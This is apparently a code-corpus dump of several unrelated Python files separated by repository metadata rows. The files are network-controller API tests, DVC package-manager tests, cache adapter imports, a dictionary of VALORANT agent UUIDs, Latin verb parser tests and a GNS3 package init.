self.api.virtual_network_create(vn_obj)
vn_fqname = mock_zk.get_vn_from_id(vn_obj.virtual_network_network_id)
vn_id = vn_obj.virtual_network_network_id
# Change vn to vxlan type
vxlan_id = 6000
vn_obj_properties = VirtualNetworkType(forwarding_mode='l3')
vn_obj_properties.set_vxlan_network_identifier(vxlan_id)
vn_obj_properties.set_forwarding_mode('l2_l3')
vn_obj.set_virtual_network_properties(vn_obj_properties)
def stub(*args, **kwargs):
return (False, (500, "Fake error"))
zk_alloc_count_start = mock_zk._vn_id_allocator.get_alloc_count()
with ExpectedException(HttpError):
with test_common.flexmocks(
[(self._api_server._db_conn, 'dbe_update', stub)]):
self.api.virtual_network_update(vn_obj)
# Make sure vxlan_id was dealocated
new_vxlan_fqname = mock_zk.get_vn_from_id(vxlan_id)
self.assertEqual(new_vxlan_fqname, None)
# Make sure vn id is the same
new_vn_id = vn_obj.virtual_network_network_id
self.assertEqual(vn_id, new_vn_id)
# Make sure fqname is the same fot vn_id
update_vn_fqname = mock_zk.get_vn_from_id(
vn_obj.virtual_network_network_id)
self.assertEqual(vn_fqname, update_vn_fqname)
# Make sure allocation counter stays the same
zk_alloc_count_current = mock_zk._vn_id_allocator.get_alloc_count()
self.assertEqual(zk_alloc_count_start, zk_alloc_count_current)
def test_create_provider_vn(self):
project = Project('%s-project' % self.id())
project_uuid = self.api.project_create(project)
project = self.api.project_read(id=project_uuid)
vn = VirtualNetwork('%s-vn' % self.id(), parent_obj=project)
vn.set_is_provider_network(True)
vn.set_provider_properties(
ProviderDetails(
params_dict={"segmentation_id": 100,
"physical_network": "physnet1"}))
vn_uuid = self.api.virtual_network_create(vn)
is_provider_network = (self
.api.virtual_network_read(id=vn_uuid)
.get_is_provider_network())
self.assertTrue(is_provider_network)
# end test_create_provider_vn
def test_create_provider_vn_without_provider_details(self):
project = Project('%s-project' % self.id())
project_uuid = self.api.project_create(project)
project = self.api.project_read(id=project_uuid)
vn = VirtualNetwork('%s-vn' % self.id(), parent_obj=project)
vn.set_is_provider_network(True)
vn_uuid = self.api.virtual_network_create(vn)
is_provider_network = (self
.api.virtual_network_read(id=vn_uuid)
.get_is_provider_network())
self.assertTrue(is_provider_network)
# end test_create_provider_vn_without_provider_details
def test_update_not_in_use_non_provider_vn_to_provider(self):
project = Project('%s-project' % self.id())
project_uuid = self.api.project_create(project)
project = self.api.project_read(id=project_uuid)
vn = VirtualNetwork('%s-vn' % self.id(), parent_obj=project)
vn_uuid = self.api.virtual_network_create(vn)
vn = self.api.virtual_network_read(id=vn_uuid)
is_provider_network = vn.get_is_provider_network()
self.assertFalse(is_provider_network)
vn.set_is_provider_network(True)
vn.set_provider_properties(
ProviderDetails(
params_dict={"segmentation_id": 100,
"physical_network": "physnet1"}))
self.api.virtual_network_update(vn)
vn = self.api.virtual_network_read(id=vn_uuid)
is_provider_network = vn.get_is_provider_network()
self.assertTrue(is_provider_network)
updated_provider_properties = vn.get_provider_properties()
segmentation_id = updated_provider_properties.get_segmentation_id()
physical_network = updated_provider_properties.get_physical_network()
self.assertEqual((100, "physnet1"),
(segmentation_id, physical_network))
# end test_update_non_provider_vn_to_provider
def test_update_non_provider_vn_to_provider_without_provider_details(self):
project = Project('%s-project' % self.id())
project_uuid = self.api.project_create(project)
project = self.api.project_read(id=project_uuid)
vn = VirtualNetwork('%s-vn' % self.id(), parent_obj=project)
vn_uuid = self.api.virtual_network_create(vn)
vn = self.api.virtual_network_read(id=vn_uuid)
is_provider_network = vn.get_is_provider_network()
self.assertFalse(is_provider_network)
vn.set_is_provider_network(True)
self.api.virtual_network_update(vn)
vn = self.api.virtual_network_read(id=vn_uuid)
is_provider_network = vn.get_is_provider_network()
self.assertTrue(is_provider_network)
# end test_update_non_provider_vn_to_provider_without_provider_details
def test_update_in_use_vn_to_provider_vn(self):
project = Project('%s-project' % self.id())
project_uuid = self.api.project_create(project)
project = self.api.project_read(id=project_uuid)
vn = VirtualNetwork('%s-vn' % self.id(), parent_obj=project)
vn_uuid = self.api.virtual_network_create(vn)
vmi = VirtualMachineInterface('%s-vmi' % self.id(), parent_obj=project)
vmi.set_virtual_network(vn)
self.api.virtual_machine_interface_create(vmi)
vn = self.api.virtual_network_read(id=vn_uuid)
vn.set_is_provider_network(True)
vn.set_provider_properties(
ProviderDetails(
params_dict={"segmentation_id": 100,
"physical_network": "physnet1"}))
self.api.virtual_network_update(vn)
updated_provider_properties = (self
.api.virtual_network_read(id=vn.uuid)
.get_provider_properties())
segmentation_id = updated_provider_properties.get_segmentation_id()
physical_network = updated_provider_properties.get_physical_network()
self.assertEqual((100, "physnet1"),
(segmentation_id, physical_network))
# end test_update_in_use_vn_to_provider_vn
def test_update_in_use_vn_to_provider_vn_without_physnet_label(self):
project = Project('%s-project' % self.id())
project_uuid = self.api.project_create(project)
project = self.api.project_read(id=project_uuid)
vn = VirtualNetwork('%s-vn' % self.id(), parent_obj=project)
vn_uuid = self.api.virtual_network_create(vn)
vmi = VirtualMachineInterface('%s-vmi' % self.id(), parent_obj=project)
vmi.set_virtual_network(vn)
self.api.virtual_machine_interface_create(vmi)
vn = self.api.virtual_network_read(id=vn_uuid)
vn.set_is_provider_network(True)
vn.set_provider_properties(
ProviderDetails(
params_dict={"segmentation_id": 100}))
with ExpectedException(RefsExistError):
self.api.virtual_network_update(vn)
updated_provider_properties = (self
.api.virtual_network_read(id=vn.uuid)
.get_provider_properties())
self.assertEqual(None, updated_provider_properties)
# end test_update_in_use_vn_to_provider_vn_without_physnet_label
def test_update_in_use_vn_to_provider_vn_without_segmentation(self):
project = Project('%s-project' % self.id())
project_uuid = self.api.project_create(project)
project = self.api.project_read(id=project_uuid)
vn = VirtualNetwork('%s-vn' % self.id(), parent_obj=project)
vn_uuid = self.api.virtual_network_create(vn)
vmi = VirtualMachineInterface('%s-vmi' % self.id(), parent_obj=project)
vmi.set_virtual_network(vn)
self.api.virtual_machine_interface_create(vmi)
vn = self.api.virtual_network_read(id=vn_uuid)
vn.set_is_provider_network(True)
vn.set_provider_properties(
ProviderDetails(
params_dict={"physical_network": "physnet1"}))
with ExpectedException(RefsExistError):
self.api.virtual_network_update(vn)
updated_provider_properties = (self
.api.virtual_network_read(id=vn.uuid)
.get_provider_properties())
self.assertEqual(None, updated_provider_properties)
# end test_update_in_use_vn_to_provider_vn_without_segmentation
def test_update_in_use_provider_vn(self):
project = Project('%s-project' % self.id())
project_uuid = self.api.project_create(project)
project = self.api.project_read(id=project_uuid)
vn = VirtualNetwork('%s-vn' % self.id(), parent_obj=project)
vn.set_is_provider_network(True)
vn.set_provider_properties(
ProviderDetails(
params_dict={"segmentation_id": 100,
"physical_network": "physnet1"}))
vn_uuid = self.api.virtual_network_create(vn)
vmi = VirtualMachineInterface('%s-vmi' % self.id(), parent_obj=project)
vmi.set_virtual_network(vn)
self.api.virtual_machine_interface_create(vmi)
vn = self.api.virtual_network_read(id=vn_uuid)
vn.set_provider_properties(
ProviderDetails(
params_dict={"segmentation_id": 200,
"physical_network": "physnet2"}))
with ExpectedException(RefsExistError):
self.api.virtual_network_update(vn)
updated_provider_properties = (self
.api.virtual_network_read(id=vn.uuid)
.get_provider_properties())
segmentation_id = updated_provider_properties.get_segmentation_id()
physical_network = updated_provider_properties.get_physical_network()
self.assertEqual((100, "physnet1"),
(segmentation_id, physical_network))
# end test_update_in_use_provider_vn
| 42.903138
| 79
| 0.682651
| 4,119
| 31,448
| 4.792425
| 0.058752
| 0.032168
| 0.058156
| 0.082979
| 0.888095
| 0.860436
| 0.8269
| 0.800709
| 0.790172
| 0.774012
| 0
| 0.00951
| 0.230953
| 31,448
| 732
| 80
| 42.961749
| 0.806698
| 0.074917
| 0
| 0.726054
| 0
| 0
| 0.047484
| 0.005487
| 0
| 0
| 0
| 0.001366
| 0.088123
| 1
| 0.065134
| false
| 0.009579
| 0.032567
| 0.011494
| 0.111111
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5a49e16c79e7766c893de993c2b4108841560d63
| 4,824
|
py
|
Python
|
tests/func/test_pkg.py
|
amisev/dvc
|
025de9aeb509a539d5560f82caf47e851162f4a2
|
[
"Apache-2.0"
] | null | null | null |
tests/func/test_pkg.py
|
amisev/dvc
|
025de9aeb509a539d5560f82caf47e851162f4a2
|
[
"Apache-2.0"
] | null | null | null |
tests/func/test_pkg.py
|
amisev/dvc
|
025de9aeb509a539d5560f82caf47e851162f4a2
|
[
"Apache-2.0"
] | null | null | null |
import os
import git
import filecmp
from dvc.pkg import PkgManager
from tests.utils import trees_equal
def test_install_and_uninstall(repo_dir, dvc_repo, pkg):
name = os.path.basename(pkg.root_dir)
pkg_dir = os.path.join(repo_dir.root_dir, ".dvc", "pkg")
mypkg_dir = os.path.join(pkg_dir, name)
dvc_repo.pkg.install(pkg.root_dir)
assert os.path.exists(pkg_dir)
assert os.path.isdir(pkg_dir)
assert os.path.exists(mypkg_dir)
assert os.path.isdir(mypkg_dir)
assert os.path.isdir(os.path.join(mypkg_dir, ".git"))
dvc_repo.pkg.install(pkg.root_dir)
assert os.path.exists(pkg_dir)
assert os.path.isdir(pkg_dir)
assert os.path.exists(mypkg_dir)
assert os.path.isdir(mypkg_dir)
assert os.path.isdir(os.path.join(mypkg_dir, ".git"))
git_repo = git.Repo(mypkg_dir)
assert git_repo.active_branch.name == "master"
dvc_repo.pkg.uninstall(name)
assert not os.path.exists(mypkg_dir)
dvc_repo.pkg.uninstall(name)
assert not os.path.exists(mypkg_dir)
def test_uninstall_corrupted(repo_dir, dvc_repo):
name = os.path.basename("mypkg")
pkg_dir = os.path.join(repo_dir.root_dir, ".dvc", "pkg")
mypkg_dir = os.path.join(pkg_dir, name)
os.makedirs(mypkg_dir)
dvc_repo.pkg.uninstall(name)
assert not os.path.exists(mypkg_dir)
def test_force_install(repo_dir, dvc_repo, pkg):
name = os.path.basename(pkg.root_dir)
pkg_dir = os.path.join(repo_dir.root_dir, ".dvc", "pkg")
mypkg_dir = os.path.join(pkg_dir, name)
os.makedirs(mypkg_dir)
dvc_repo.pkg.install(pkg.root_dir)
assert not os.listdir(mypkg_dir)
dvc_repo.pkg.install(pkg.root_dir, force=True)
assert os.path.exists(pkg_dir)
assert os.path.isdir(pkg_dir)
assert os.path.exists(mypkg_dir)
assert os.path.isdir(mypkg_dir)
assert os.path.isdir(os.path.join(mypkg_dir, ".git"))
def test_install_version(repo_dir, dvc_repo, pkg):
name = os.path.basename(pkg.root_dir)
pkg_dir = os.path.join(repo_dir.root_dir, ".dvc", "pkg")
mypkg_dir = os.path.join(pkg_dir, name)
dvc_repo.pkg.install(pkg.root_dir, version="branch")
assert os.path.exists(pkg_dir)
assert os.path.isdir(pkg_dir)
assert os.path.exists(mypkg_dir)
assert os.path.isdir(mypkg_dir)
assert os.path.isdir(os.path.join(mypkg_dir, ".git"))
git_repo = git.Repo(mypkg_dir)
assert git_repo.active_branch.name == "branch"
def test_import(repo_dir, dvc_repo, pkg):
name = os.path.basename(pkg.root_dir)
src = pkg.FOO
dst = pkg.FOO + "_imported"
dvc_repo.pkg.install(pkg.root_dir)
dvc_repo.pkg.imp(name, src, dst)
assert os.path.exists(dst)
assert os.path.isfile(dst)
assert filecmp.cmp(repo_dir.FOO, dst, shallow=False)
def test_import_dir(repo_dir, dvc_repo, pkg):
name = os.path.basename(pkg.root_dir)
src = pkg.DATA_DIR
dst = pkg.DATA_DIR + "_imported"
dvc_repo.pkg.install(pkg.root_dir)
dvc_repo.pkg.imp(name, src, dst)
assert os.path.exists(dst)
assert os.path.isdir(dst)
trees_equal(src, dst)
def test_import_url(repo_dir, dvc_repo, pkg):
name = os.path.basename(pkg.root_dir)
pkg_dir = os.path.join(repo_dir.root_dir, ".dvc", "pkg")
mypkg_dir = os.path.join(pkg_dir, name)
src = pkg.FOO
dst = pkg.FOO + "_imported"
dvc_repo.pkg.imp(pkg.root_dir, src, dst)
assert os.path.exists(pkg_dir)
assert os.path.isdir(pkg_dir)
assert os.path.exists(mypkg_dir)
assert os.path.isdir(mypkg_dir)
assert os.path.isdir(os.path.join(mypkg_dir, ".git"))
assert os.path.exists(dst)
assert os.path.isfile(dst)
assert filecmp.cmp(repo_dir.FOO, dst, shallow=False)
def test_import_url_version(repo_dir, dvc_repo, pkg):
name = os.path.basename(pkg.root_dir)
pkg_dir = os.path.join(repo_dir.root_dir, ".dvc", "pkg")
mypkg_dir = os.path.join(pkg_dir, name)
src = "version"
dst = src
dvc_repo.pkg.imp(pkg.root_dir, src, dst, version="branch")
assert os.path.exists(pkg_dir)
assert os.path.isdir(pkg_dir)
assert os.path.exists(mypkg_dir)
assert os.path.isdir(mypkg_dir)
assert os.path.isdir(os.path.join(mypkg_dir, ".git"))
assert os.path.exists(dst)
assert os.path.isfile(dst)
with open(dst, "r+") as fobj:
assert fobj.read() == "branch"
def test_get_file(repo_dir, dvc_repo, pkg):
src = pkg.FOO
dst = pkg.FOO + "_imported"
PkgManager.get(pkg.root_dir, src, dst)
assert os.path.exists(dst)
assert os.path.isfile(dst)
assert filecmp.cmp(repo_dir.FOO, dst, shallow=False)
def test_get_dir(repo_dir, dvc_repo, pkg):
src = pkg.DATA_DIR
dst = pkg.DATA_DIR + "_imported"
PkgManager.get(pkg.root_dir, src, dst)
assert os.path.exists(dst)
assert os.path.isdir(dst)
trees_equal(src, dst)
| 27.565714
| 62
| 0.692993
| 804
| 4,824
| 3.956468
| 0.070896
| 0.13392
| 0.158441
| 0.122603
| 0.897517
| 0.897517
| 0.89563
| 0.879283
| 0.877397
| 0.8315
| 0
| 0
| 0.173093
| 4,824
| 174
| 63
| 27.724138
| 0.797443
| 0
| 0
| 0.778689
| 0
| 0
| 0.032131
| 0
| 0
| 0
| 0
| 0
| 0.42623
| 1
| 0.081967
| false
| 0
| 0.114754
| 0
| 0.196721
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
5a69bc34e6d7a55844c7d9ffc3db6aae966673bd
| 161
|
py
|
Python
|
lasier/adapters/caches/__init__.py
|
luizalabs/lasier
|
edb0e850cb630fb55ce83c255bbb1e7fca08b21f
|
[
"MIT"
] | 61
|
2019-12-13T20:08:30.000Z
|
2022-03-22T11:51:04.000Z
|
lasier/adapters/caches/__init__.py
|
jairhenrique/lasier
|
29bf96cb888493d369a22400bec6acffe345d168
|
[
"MIT"
] | 25
|
2019-12-13T17:14:46.000Z
|
2022-03-17T18:49:34.000Z
|
lasier/adapters/caches/__init__.py
|
jairhenrique/lasier
|
29bf96cb888493d369a22400bec6acffe345d168
|
[
"MIT"
] | 6
|
2020-04-02T21:10:08.000Z
|
2022-03-17T15:31:15.000Z
|
from .aiocache import Adapter as AiocacheAdapter # noqa
from .django import Adapter as DjangoAdapter # noqa
from .redis import Adapter as RedisAdapter # noqa
| 40.25
| 56
| 0.795031
| 21
| 161
| 6.095238
| 0.52381
| 0.304688
| 0.351563
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.167702
| 161
| 3
| 57
| 53.666667
| 0.955224
| 0.086957
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
ce56027bba1dafd0566245479a05ec73c1dc496b
| 2,603
|
py
|
Python
|
ValAgents.py
|
Mister-SOSA/ValAgents
|
06fcc47c24dc1ded6b8d79710f485c24d726ca76
|
[
"MIT"
] | null | null | null |
ValAgents.py
|
Mister-SOSA/ValAgents
|
06fcc47c24dc1ded6b8d79710f485c24d726ca76
|
[
"MIT"
] | null | null | null |
ValAgents.py
|
Mister-SOSA/ValAgents
|
06fcc47c24dc1ded6b8d79710f485c24d726ca76
|
[
"MIT"
] | null | null | null |
""" Dictionaries of all VALORANT agents with their respective UUIDs, categorized by role. """
list_all_agents = {
"Jett" : "add6443a-41bd-e414-f6ad-e58d267f4e95",
"Reyna" : "a3bfb853-43b2-7238-a4f1-ad90e9e46bcc",
"Raze" : "f94c3b30-42be-e959-889c-5aa313dba261",
"Yoru" : "7f94d92c-4234-0a36-9646-3a87eb8b5c89",
"Phoenix" : "eb93336a-449b-9c1b-0a54-a891f7921d69",
"Neon" : "bb2a4828-46eb-8cd1-e765-15848195d751",
"Breach" : "5f8d3a7f-467b-97f3-062c-13acf203c006",
"Skye" : "6f2a04ca-43e0-be17-7f36-b3908627744d",
"Sova" : "320b2a48-4d9b-a075-30f1-1f93a9b638fa",
"KAY/O" : "601dbbe7-43ce-be57-2a40-4abd24953621",
"Killjoy" : "1e58de9c-4950-5125-93e9-a0aee9f98746",
"Cypher" : "117ed9e3-49f3-6512-3ccf-0cada7e3823b",
"Sage" : "569fdd95-4d10-43ab-ca70-79becc718b46",
"Chamber" : "22697a3d-45bf-8dd7-4fec-84a9e28c69d7",
"Omen" : "8e253930-4c05-31dd-1b6c-968525494517",
"Brimstone" : "9f0d8ba9-4140-b941-57d3-a7ad57c6b417",
"Astra" : "41fb69c1-4189-7b37-f117-bcaf1e96f1bf",
"Viper" : "707eab51-4836-f488-046a-cda6bf494859"
}
list_deulists = {
"Jett" : "add6443a-41bd-e414-f6ad-e58d267f4e95",
"Reyna" : "a3bfb853-43b2-7238-a4f1-ad90e9e46bcc",
"Raze" : "f94c3b30-42be-e959-889c-5aa313dba261",
"Yoru" : "7f94d92c-4234-0a36-9646-3a87eb8b5c89",
"Phoenix" : "eb93336a-449b-9c1b-0a54-a891f7921d69",
"Neon" : "bb2a4828-46eb-8cd1-e765-15848195d751"
}
list_initiators = {
"Breach" : "5f8d3a7f-467b-97f3-062c-13acf203c006",
"Skye" : "6f2a04ca-43e0-be17-7f36-b3908627744d",
"Sova" : "320b2a48-4d9b-a075-30f1-1f93a9b638fa",
"KAY/O" : "601dbbe7-43ce-be57-2a40-4abd24953621"
}
list_sentinels = {
"Killjoy" : "1e58de9c-4950-5125-93e9-a0aee9f98746",
"Cypher" : "117ed9e3-49f3-6512-3ccf-0cada7e3823b",
"Sage" : "569fdd95-4d10-43ab-ca70-79becc718b46",
"Chamber" : "22697a3d-45bf-8dd7-4fec-84a9e28c69d7"
}
list_controllers = {
"Omen" : "8e253930-4c05-31dd-1b6c-968525494517",
"Brimstone" : "9f0d8ba9-4140-b941-57d3-a7ad57c6b417",
"Astra" : "41fb69c1-4189-7b37-f117-bcaf1e96f1bf",
"Viper" : "707eab51-4836-f488-046a-cda6bf494859"
}
def deulists():
return list_deulists
def initiators():
return list_initiators
def sentinels():
return list_sentinels
def controllers():
return list_controllers
def returnAgents(role):
if (role == 'deulists'):
return list_deulists
if (role == 'initiators'):
return list_initiators
if (role == 'sentinels'):
return list_sentinels
if (role == 'controllers'):
return list_controllers
| 34.706667
| 93
| 0.683058
| 288
| 2,603
| 6.125
| 0.451389
| 0.045351
| 0.018141
| 0.022676
| 0.758503
| 0.758503
| 0.758503
| 0.758503
| 0.758503
| 0.758503
| 0
| 0.340754
| 0.154437
| 2,603
| 74
| 94
| 35.175676
| 0.4607
| 0.032655
| 0
| 0.603175
| 0
| 0
| 0.606375
| 0.516335
| 0
| 0
| 0
| 0
| 0
| 1
| 0.079365
| false
| 0
| 0
| 0.063492
| 0.206349
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
ce805bf1b4c52a5e9fb1250d1cb0b232e3484b16
| 9,126
|
py
|
Python
|
tests/integration/Test_Verbs.py
|
Drewlark/whitakers_words
|
c0bf18d06215eb1e585413e5d426c9426b30c85a
|
[
"MIT"
] | null | null | null |
tests/integration/Test_Verbs.py
|
Drewlark/whitakers_words
|
c0bf18d06215eb1e585413e5d426c9426b30c85a
|
[
"MIT"
] | null | null | null |
tests/integration/Test_Verbs.py
|
Drewlark/whitakers_words
|
c0bf18d06215eb1e585413e5d426c9426b30c85a
|
[
"MIT"
] | null | null | null |
import unittest
from whitakers_words.enums import Mood, Number, Person, Tense, Voice, WordType
from whitakers_words.parser import Parser
class VerbTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.par = Parser()
def test_amat(self):
result = self.par.parse("amat")
self.assertEqual(len(result.forms), 1)
self.assertEqual(len(result.forms[0].analyses), 1)
for analysis in result.forms[0].analyses.values():
self.assertEqual(analysis.lexeme.roots[0], "am")
self.assertEqual(analysis.lexeme.wordType, WordType.V)
self.assertEqual(len(analysis.inflections), 1)
expected_features = {
"Mood": Mood.IND,
"Number": Number.S,
"Person": Person["3"],
"Tense": Tense.PRES,
"Voice": Voice.ACTIVE,
}
self.assertEqual(analysis.inflections[0].stem, "am")
self.assertEqual(analysis.inflections[0].affix, "at")
self.assertEqual(analysis.inflections[0].wordType, WordType.V)
self.assertEqual(analysis.inflections[0].features, expected_features)
def test_quaero(self):
result = self.par.parse("quaerebar")
# response syntax and basics
self.assertEqual(len(result.forms), 1)
self.assertEqual(len(result.forms[0].analyses), 1)
for analysis in result.forms[0].analyses.values():
self.assertEqual(analysis.lexeme.roots[0], "quaer")
self.assertEqual(analysis.lexeme.wordType, WordType.V)
self.assertEqual(len(analysis.inflections), 1)
expected_features = {
"Mood": Mood.IND,
"Number": Number.S,
"Person": Person["1"],
"Tense": Tense.IMPF,
"Voice": Voice.PASSIVE,
}
self.assertEqual(analysis.inflections[0].stem, "quaer")
self.assertEqual(analysis.inflections[0].affix, "ebar")
self.assertEqual(analysis.inflections[0].wordType, WordType.V)
self.assertEqual(analysis.inflections[0].features, expected_features)
def test_tulisti(self):
result = self.par.parse("tulisti")
# response syntax and basics
self.assertEqual(len(result.forms), 1)
self.assertEqual(len(result.forms[0].analyses), 1)
for analysis in result.forms[0].analyses.values():
self.assertEqual(analysis.lexeme.roots[0], "fer")
self.assertEqual(analysis.lexeme.wordType, WordType.V)
self.assertEqual(len(analysis.inflections), 1)
expected_features = {
"Mood": Mood.IND,
"Number": Number.S,
"Person": Person["2"],
"Tense": Tense.PERF,
"Voice": Voice.ACTIVE,
}
self.assertEqual(analysis.inflections[0].stem, "tul")
self.assertEqual(analysis.inflections[0].affix, "isti")
self.assertEqual(analysis.inflections[0].wordType, WordType.V)
self.assertEqual(analysis.inflections[0].features, expected_features)
def test_amavisse(self):
result = self.par.parse("amavisse")
# response syntax and basics
self.assertEqual(len(result.forms), 1)
self.assertEqual(len(result.forms[0].analyses), 1)
for analysis in result.forms[0].analyses.values():
self.assertEqual(analysis.lexeme.roots[0], "am")
self.assertEqual(analysis.lexeme.wordType, WordType.V)
self.assertEqual(len(analysis.inflections), 1)
expected_features = {
"Mood": Mood.INF,
"Number": Number.X,
"Person": Person["0"],
"Tense": Tense.PERF,
"Voice": Voice.ACTIVE,
}
self.assertEqual(analysis.inflections[0].stem, "amav")
self.assertEqual(analysis.inflections[0].affix, "isse")
self.assertEqual(analysis.inflections[0].wordType, WordType.V)
self.assertEqual(analysis.inflections[0].features, expected_features)
def test_abiri(self):
result = self.par.parse("abiri")
# response syntax and basics
self.assertEqual(len(result.forms), 1)
self.assertEqual(len(result.forms[0].analyses), 1)
for analysis in result.forms[0].analyses.values():
self.assertEqual(analysis.lexeme.roots[0], "abe")
self.assertEqual(analysis.lexeme.wordType, WordType.V)
self.assertEqual(len(analysis.inflections), 1)
expected_features = {
"Mood": Mood.INF,
"Number": Number.X,
"Person": Person["0"],
"Tense": Tense.PRES,
"Voice": Voice.PASSIVE,
}
self.assertEqual(analysis.inflections[0].stem, "abi")
self.assertEqual(analysis.inflections[0].affix, "ri")
self.assertEqual(analysis.inflections[0].wordType, WordType.V)
self.assertEqual(analysis.inflections[0].features, expected_features)
def test_decet(self):
result = self.par.parse("decet")
# response syntax and basics
self.assertEqual(len(result.forms), 1)
self.assertEqual(len(result.forms[0].analyses), 1)
for analysis in result.forms[0].analyses.values():
self.assertEqual(analysis.lexeme.roots[0], "dec")
self.assertEqual(analysis.lexeme.wordType, WordType.V)
self.assertEqual(len(analysis.inflections), 1)
expected_features = {
"Mood": Mood.IND,
"Number": Number.S,
"Person": Person["3"],
"Tense": Tense.PRES,
"Voice": Voice.ACTIVE,
}
self.assertEqual(analysis.inflections[0].stem, "dec")
self.assertEqual(analysis.inflections[0].affix, "et")
self.assertEqual(analysis.inflections[0].wordType, WordType.V)
self.assertEqual(analysis.inflections[0].features, expected_features)
def test_alit(self):
result = self.par.parse("alit")
# response syntax and basics
self.assertEqual(len(result.forms), 1)
self.assertEqual(len(result.forms[0].analyses), 2)
for analysis in result.forms[0].analyses.values():
self.assertEqual(analysis.lexeme.roots[0], "al")
self.assertEqual(analysis.lexeme.wordType, WordType.V)
self.assertEqual(len(analysis.inflections), 1)
expected_features = {
"Mood": Mood.IND,
"Number": Number.S,
"Person": Person["3"],
"Tense": Tense.PRES,
"Voice": Voice.ACTIVE,
}
self.assertEqual(analysis.inflections[0].stem, "al")
self.assertEqual(analysis.inflections[0].affix, "it")
self.assertEqual(analysis.inflections[0].wordType, WordType.V)
self.assertEqual(analysis.inflections[0].features, expected_features)
def test_venit(self):
result = self.par.parse("venit")
# response syntax and basics
self.assertEqual(len(result.forms), 1)
self.assertEqual(len(result.forms[0].analyses), 2)
for analysis in result.forms[0].analyses.values():
self.assertEqual(analysis.lexeme.wordType, WordType.V)
if analysis.lexeme.roots[0] == "vene":
# venere, venio = to be sold as a slave
self.assertEqual(len(analysis.inflections), 1)
expected_features = {
"Mood": Mood.IND,
"Number": Number.S,
"Person": Person["3"],
"Tense": Tense.PRES,
"Voice": Voice.ACTIVE,
}
self.assertEqual(analysis.inflections[0].stem, "veni")
self.assertEqual(analysis.inflections[0].affix, "t")
self.assertEqual(analysis.inflections[0].wordType, WordType.V)
self.assertEqual(analysis.inflections[0].features, expected_features)
elif analysis.lexeme.roots[0] == "veni":
self.assertEqual(len(analysis.inflections), 2)
for inflection in analysis.inflections:
self.assertEqual(analysis.inflections[0].stem, "ven")
self.assertEqual(analysis.inflections[0].affix, "it")
self.assertEqual(analysis.inflections[0].wordType, WordType.V)
self.assertTrue(inflection.has_feature(Mood.IND))
self.assertTrue(inflection.has_feature(Number.S))
self.assertTrue(inflection.has_feature(Person["3"]))
self.assertTrue(inflection.has_feature(Voice.ACTIVE))
other_features = [x.features["Tense"] for x in analysis.inflections]
self.assertTrue(Tense.PRES in other_features)
self.assertTrue(Tense.PERF in other_features)
else:
self.fail("Invalid root")
| 45.178218
| 85
| 0.585141
| 945
| 9,126
| 5.615873
| 0.112169
| 0.211984
| 0.216695
| 0.224232
| 0.876013
| 0.810251
| 0.750141
| 0.746938
| 0.746938
| 0.725834
| 0
| 0.014495
| 0.289393
| 9,126
| 201
| 86
| 45.402985
| 0.803855
| 0.024764
| 0
| 0.609195
| 0
| 0
| 0.040603
| 0
| 0
| 0
| 0
| 0
| 0.465517
| 1
| 0.051724
| false
| 0.011494
| 0.017241
| 0
| 0.074713
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
0b735f175b94591aedb43cb089d7a0f138df40ce
| 204
|
py
|
Python
|
pygns3/__init__.py
|
mvdwoord/PyGNS3
|
e44f57be97f01e5a41fd1847860a5a78b5754790
|
[
"MIT"
] | 9
|
2017-08-11T09:31:42.000Z
|
2020-03-31T12:59:16.000Z
|
pygns3/__init__.py
|
mvdwoord/PyGNS3
|
e44f57be97f01e5a41fd1847860a5a78b5754790
|
[
"MIT"
] | 3
|
2019-02-22T13:28:34.000Z
|
2019-09-09T16:15:20.000Z
|
pygns3/__init__.py
|
mvdwoord/PyGNS3
|
e44f57be97f01e5a41fd1847860a5a78b5754790
|
[
"MIT"
] | 7
|
2017-10-05T18:25:13.000Z
|
2021-06-28T10:23:18.000Z
|
from .controller import GNS3API, GNS3Compute, GNS3Controller, GNS3Project, GNS3VM
from requests.auth import HTTPBasicAuth
__all__ = ['GNS3API', 'GNS3Compute', 'GNS3Controller', 'GNS3Project', 'GNS3VM']
| 34
| 81
| 0.784314
| 19
| 204
| 8.210526
| 0.631579
| 0.230769
| 0.410256
| 0.551282
| 0.628205
| 0
| 0
| 0
| 0
| 0
| 0
| 0.054645
| 0.102941
| 204
| 5
| 82
| 40.8
| 0.797814
| 0
| 0
| 0
| 0
| 0
| 0.241379
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
